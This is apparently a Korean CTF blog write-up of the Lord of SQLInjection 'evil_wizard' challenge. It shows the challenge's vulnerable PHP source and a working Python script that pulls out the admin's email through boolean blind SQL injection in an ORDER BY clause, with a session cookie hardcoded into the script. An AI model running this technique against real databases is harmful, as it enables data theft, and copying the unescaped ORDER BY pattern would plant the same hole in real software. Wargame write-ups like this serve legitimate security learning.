[ LOS ] Lord of SQLInjection 24번 풀이(evil_wizard)

sangjun

·

2022. 1. 13. 21:36


 

문제소스

id	email	score
query : select id,email,score from prob_evil_wizard where 1 order by
<?php
  // LOS "evil_wizard": blind SQL injection through an unquoted ORDER BY expression.
  include "./config.php";
  login_chk();
  $db = dbconnect();
  // Case-insensitive blacklist on the `order` parameter: prob, _, ., proc, union,
  // sleep, benchmark. Union- and time-based techniques are cut off, but if(),
  // ord(), mid() and comparison operators are not matched, so a boolean oracle
  // via row ordering remains. A blacklist is the wrong control here: an ORDER BY
  // target should be taken from an allowlist of known column names.
  if(preg_match('/prob|_|\.|proc|union|sleep|benchmark/i', $_GET[order])) exit("No Hack ~_~");
  // $_GET[order] is interpolated unquoted into ORDER BY. Escaping cannot help in
  // this position and a prepared-statement placeholder cannot stand in for a column.
  $query = "select id,email,score from prob_evil_wizard where 1 order by {$_GET[order]}"; // same with hell_fire? really?
  echo "<table border=1><tr><th>id</th><th>email</th><th>score</th>";
  $rows = mysqli_query($db,$query);
  while(($result = mysqli_fetch_array($rows))){
    // admin's email is masked in the output, so it can only be inferred from
    // where the admin row lands in the sorted table.
    if($result['id'] == "admin") $result['email'] = "**************";
    echo "<tr><td>{$result[id]}</td><td>{$result[email]}</td><td>{$result[score]}</td></tr>";
  }
  // The executed query is echoed back verbatim (intended for the challenge;
  // outside a CTF this is an information leak).
  echo "</table><hr>query : <strong>{$query}</strong><hr>";

  // Second query: addslashes() escapes quotes in the value, so this one only
  // verifies the guess; note $_GET[email] is overwritten with the escaped form.
  $_GET[email] = addslashes($_GET[email]);
  $query = "select email from prob_evil_wizard where id='admin' and email='{$_GET[email]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  // Strict === against the (escaped) submitted value: the recovered email must
  // match byte for byte, so case and punctuation matter during extraction.
  if(($result['email']) && ($result['email'] === $_GET['email'])) solve("evil_wizard");
  highlight_file(__FILE__);
?>

 

문제 분석 및 페이로드

1. 필터(sleep, benchmark, union 등 차단) 때문에 time based, union based 같은 기법은 쓸 수 없다. 남는 것은 order by를 이용한 boolean based blind SQLi다.

2. if문과 order by를 통해 email을 알아내자

3. order by에 if(조건, 1, 999999)를 넣으면, 조건이 참일 때 admin 행의 정렬 키만 1이 되어 admin이 첫 번째 행으로 온다. (거짓이면 모든 행이 999999로 같아 기본 순서가 유지된다.)

--> 이것으로 참과 거짓을 구별할 수 있다. (거짓일 때 동점 행의 순서는 MySQL이 보장하지 않으므로, 결과가 흔들리면 `, id desc` 같은 2차 정렬 키를 붙여 고정하는 편이 안전하다.)

 

import os
import string

import requests
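URL = "https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php"
# Candidate characters for each position of the email. Only ord(ch) is sent to
# the server, so punctuation here never needs URL-escaping.
brute = string.digits + string.ascii_letters + string.punctuation
# A PHPSESSID is a login credential: prefer passing it via the environment
# instead of committing it. The literal is the original post's session and
# only remains as the fallback so the script behaves as before.
cookies = {"PHPSESSID": os.environ.get("PHPSESSID", "kmo07vm0qujgagfi56vspjh5f8")}
ADMIN_ROW = "<td>admin</td>"
RUBIYA_ROW = "<td>rubiya</td>"
TIMEOUT = 10  # seconds per request; the original had none and could hang forever


def _order_payload(condition: str) -> str:
    """Return the ``order`` value that sorts admin first iff *condition* holds.

    The server filter blocks prob/_/./proc/union/sleep/benchmark only, so if(),
    ord() and mid() survive.  When the condition is true admin's sort key is 1
    and every other row's is 999999, so admin becomes the first row; when false
    all rows tie at 999999 and the default order (admin after rubiya) remains.
    NOTE(review): MySQL does not guarantee tie order; if the oracle flaps,
    appending ``, id desc`` would pin admin last in the false case.
    """
    return f"if({condition},1,999999)"


def _admin_before_rubiya(html: str) -> bool:
    """Decide the oracle from the rendered result table.

    Raises RuntimeError when either marker row is missing, which means the
    response is not the result table at all (expired session, the filter's
    "No Hack ~_~", ...).  The original compared str.find() results directly,
    so a missing admin row (-1) was silently read as "true".
    """
    admin_at = html.find(ADMIN_ROW)
    rubiya_at = html.find(RUBIYA_ROW)
    if admin_at == -1 or rubiya_at == -1:
        raise RuntimeError("result table not found in response; check PHPSESSID / filter")
    return admin_at < rubiya_at


def _ask(session: "requests.Session", condition: str) -> bool:
    """Send one boolean query and return the oracle's answer.

    ``params=`` lets requests percent-encode the payload, so characters such
    as '+', '&' or '#' inside a condition are not swallowed by the URL parser
    the way they would be with plain string concatenation.
    """
    payload = _order_payload(condition)
    print(f"?order={payload}")
    response = session.get(URL, params={"order": payload}, cookies=cookies, timeout=TIMEOUT)
    return _admin_before_rubiya(response.text)


def find_length(session: "requests.Session", max_len: int = 100) -> int:
    """Return admin's email length, or -1 if no length in [0, max_len) matches.

    The condition carries ``id='admin'`` because a bare length(email)=N would
    also match other rows (the post notes the guest row's value has length 4).
    """
    for n in range(max_len):
        if _ask(session, f"id='admin' and length(email)={n}"):
            return n
    return -1


def find_email(session: "requests.Session", length: int) -> str:
    """Recover the email one character at a time via ord(mid(email, i, 1)).

    ord() keeps the comparison case-sensitive, which matters because the
    server-side check is a strict ``===`` against the submitted string.
    Raises RuntimeError if no candidate matches a position instead of
    silently returning a shortened string as the original did.
    """
    found = []
    for pos in range(1, length + 1):
        for ch in brute:
            if _ask(session, f"id='admin' and ord(mid(email,{pos},1))={ord(ch)}"):
                found.append(ch)
                break
        else:
            raise RuntimeError(f"no candidate matched position {pos}; widen the charset")
    return "".join(found)


def main() -> None:
    """Run the two-phase blind extraction (length, then bytes) and print it."""
    print(brute)
    with requests.Session() as session:
        length = find_length(session)
        print(f"pass length is {length}")
        # length == -1 (no match) yields an empty range, exactly as before.
        passwd = find_email(session, length) if length > 0 else ""
        print(f"passwd is {passwd}")


if __name__ == "__main__":
    main()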

